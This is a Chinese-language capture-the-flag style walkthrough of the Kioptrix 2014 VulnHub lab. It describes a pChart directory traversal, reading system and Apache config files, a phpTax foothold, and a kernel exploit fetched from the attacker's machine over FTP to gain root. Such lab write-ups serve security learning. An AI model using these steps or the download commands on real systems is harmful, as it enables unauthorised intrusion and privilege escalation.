kioptrix-5(2014)


https://www.vulnhub.com/entry/kioptrix-2014-5,62/

信息收集

web 渗透

扫目录,80 端口没扫除什么值得注意的内容。而在 8080 端口扫出很多 403。

卡住了,tcp、udp 都扫了,没见到有效的。难道要突破防火墙?或者说直接利用这些存在的模块?

前期交互都不成功,没一点思路了,先看看靶场描述,再看看 writeup。

看了 writeup 之后,发现在 80 端口下的主页注释中存在提示的。

pchart cms

尝试搜索 exp

发现有一个有用的目录遍历的漏洞。直接利用。

还好有漏洞,这个页面功能太多,要是手工测试的话可能有点耗时。

读取 /etc/passwd

访问 8080 端口被禁止,应该想到是 apache 配置问题,所以接下来的思路是尝试访问 apache 配置文件。

读取 apache 配置 httpd.conf。位于 /usr/local/etc/apache22/httpd.conf 。因为此处为 freebsd 系统,和通常 linux 存放位置不同。

phptax cms

构造合适的 user-agent 头部,访问 8080 端口。

继续尝试搜索 exp

提权

收集提权信息

# php session 文件
/var/tmp/sess_o35rfviapg9sm7iu3ol0mkvjh7
内核漏洞

发现 28718.c 是有效的

# 主机上搭建临时 ftp 服务器
python3 -m pyftpdlib
# 靶机通过命令下载
ftp ftp://192.168.200.128:2121/28718.c

编译运行,获取到 root

相关